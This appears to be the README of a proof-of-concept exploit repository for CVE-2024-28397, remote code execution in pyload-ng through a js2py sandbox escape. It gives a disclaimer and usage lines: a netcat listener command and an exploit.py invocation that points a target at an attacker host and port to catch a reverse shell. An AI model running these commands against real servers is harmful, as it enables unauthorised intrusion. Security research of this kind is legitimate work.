
PoC exploit for CVE-2024-28397 – Remote Code Execution in pyload-ng via js2py sandbox escape
This repository contains a Proof-of-Concept (PoC) exploit for CVE-2024-28397, a Remote Code Execution vulnerability affecting pyload-ng due to insecure usage of js2py.
Disclaimer:
This PoC is for educational and research purposes only.
Do not use it on systems you do not own or have explicit permission to test.
The author is not responsible for any misuse of this code.
js2py in pyload-ngYou will need Python 3.x, the requests library, and netcat for catching the reverse shell.
nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123